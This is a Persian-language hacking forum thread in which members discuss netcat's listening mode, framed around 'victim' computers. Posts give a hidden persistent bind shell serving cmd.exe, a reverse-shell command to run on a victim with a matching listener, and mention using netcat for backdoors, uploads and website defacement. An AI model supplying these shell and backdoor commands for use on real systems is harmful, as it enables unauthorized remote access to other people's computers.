سوال راجع به حالت listening نت كت

pt_tomcat

Member
سلام
نت كت يك حالت داره كه مثل يك تروجان منتظر ميشه كه بهش بشه وصل شد
كسي راجعبه اين حالت اطلاعات داره
اگه ممكنه به من بگه
با تشكر
[email protected]

دوست گرامي براي بدست آوردن ليست كاملي از اطلاعات مي تونيد اين فرمان رو اجرا كنيد !

nc -help

--------------
محمد

amirhomayoun

Active Member
nc -L - p 80 : رو پورت 80 گوش وای میسته . (قطع هم نمیشه)

nc -l -p 80 : رو پورت 80 گوش وای میسته . ( بعد از 1 ارتباط قطع میشه)

nc -L -p80 -d : مخفی هم میشه ( دیده نمیشه)

nc -L -d -p80 -e cmd.exe : این عشق منه ! مخفیه و منتظر میمونه و وقتی کسی وصل شه یه shell بهش میده!

pt_tomcat

Member
ممنون
من دنبال همين دستور آخرت بودم
دقيقا همون چيزيه كه من ميخواستم

دوست گرامي آقاي امير همايون اين دستوراتي كه فرموديد الان رو سيستمهاي كلنگ صدا سيما هم رفورد نميشه ! بعد مي خواين باهاش شل بگيرين؟؟؟

--------------
محمد

pt_tomcat

Member
سلام همايون
حالت كه خوبه؟؟
محمد آقا راست ميگه
چون فايروال بهت گير ميده
به نظر من بهتر كه نت كت را روي كامپيوتر قرباني اين جوري اجرا كني
nc 127.0.0.1 1039 -e cmd.exe
البته اينجا من از ip 127.0.0.1
و از پورت 1039 استفاده كردم تا نتكت با من تماس بگيره تا شايد فايروال گير نده
و روي كامپيوتر خودت
nc -l -p1039
آقا محمد نظر شما چيه
ارش

سلام و خسته نباشيد
نظر من منفي هست !
چون باز هم فايروال از اين موضوع جبوگيري ميكنه!

-----------------
البته اينو مي تونيد در سرويس هايي كه داراي امنيت پايين هست به نتيجه برسونيد !

-----------
محمد

amirhomayoun

Active Member
جناب NorTh HaCkeR عزیز بابا تو اسمت هکره ! اسم ما که نیست!! این یک! دو این که عزیز ایشون یه سوالی کردن بنده هم جواب دادم ! حالا این که shell میده یا نه یه بحث دیگه است! Tomcat جان درست میگی این بهتره ولی اگر سیستم طرف هر firewall در پیتی داشته باشه به هیچ وجه کار نمیکنه! (به هر حال یه نرم افزار میخواد یه port رو باز کنه و گوش وایسته شوخی که نیست که!)

راستی کسی که بخواد سیستم هک کنه که با nc سعی نمیکنه که! این طور نیست محمد جان؟!

pt_tomcat

Member
سلام
اينجا هر كسي نظر خودشو گفت
البته بهتر بود كمي دوستانه تر صحبت مي شد

دوست عزيز آقاي امير همايون! اسم من هكر نيست بچه ها اينطوري خطاب مي كنن هنوز يك عمر بايد اينور اون ور برم تا تازه بشيم هكر ! اين از اين !
بعدش اينكه با تشكر از لطف شما براي راهنمايي دوستان ولي من خواستم كاملش كنم كه دوستان گمراه نشن !

بعدش در مورد نت كت من با شما مخالفم !
چون نت كت يكي از بهترين چاشني هاي نفوذ هستش ! بايد بگم اگر روزي براي بار چندم ديدين كه ناسا توسط يك تيم امنيتي ايراني هك شده بدونين كه بدون كمك نت كت نبوده !

pt_tomcat جان اشكال نداره ما به دل نميگيريم اينجا همه با هم رفيقيم ! حالا گاهي هم ...........

شاد و خرم باشي
-------------------------
محمد

amirhomayoun

Active Member
آقا چی شد . من که چیز بدی نگفتم که ! اون هم مثلا خواستم با اسمت شوخی کنم (north hacker ) من به نظرم غیر دوستانه ننوشتم ولی باز هم شرمنده اگه برخورد بهتون . ولی دقیقا منظورم این بود که کار دزست تر از من هستید . منظورم توهین یا تیکه انداختن یا ... نبود . اگه بد نوشتم ببخشید .

راستی در مورد netcat : تا وقتی به سیستم دسترسی فیزیکی نداشته باشی یا حداقل یه Shell نداشته باشی فکر نکنم به درد بخوره . (حد اقل من نتونستم تا حالا ازش این جوری استفاده کنم !) عملا این جوری به نظرم میاد که یه هکر بعد از این که یه shell پیدا کرد (حالا با استفاده از یه exploit یا هر چی) از nc استفاده میکنه تا یه backdoor روی سیستم قربانی ایجاد کنه . درسته؟

من ماکزیمم کاری که تونستم بکنم این بود که با داشتن Shell این nc رو بفرستم روی یه سیستم دیگه و یه shell دیگه پیدا کنم!!

محمد آقا با استفاده از nc به تنهایی میشه نفوذ کرد؟ (چه جوری ؟)

آقا راستی باز هم معذرت . ( آخه اون جمله "حالا گاهي هم ..........." بد جوری اذیت میکنه! )

امير همايون عزيز من محلصم عزيزم !
حالا گاهي هم منظورم شما نبودي شما كه گل سر سبد ما هستي عزيز !

فرمايشات شما رو تاييد مي كنم از اينكه به تنهايي با نت كت نميشه نفوذ كرد !

ولي قدرت نت كت رو نبايد دست كم بگيريد !

با نت كت مي تونيد اسكن كنيد !
پورت باز پيدا كنيد
كانكت بشيد
و آپلود كنيد و در قسمت نهايي
ديفيس كنيد !

اين قدرت كمي نيست !

اميدوارم منظورم رو درك كنيد !

با تشكر از شما
-----------------------
محمد

جدیدترین ارسال ها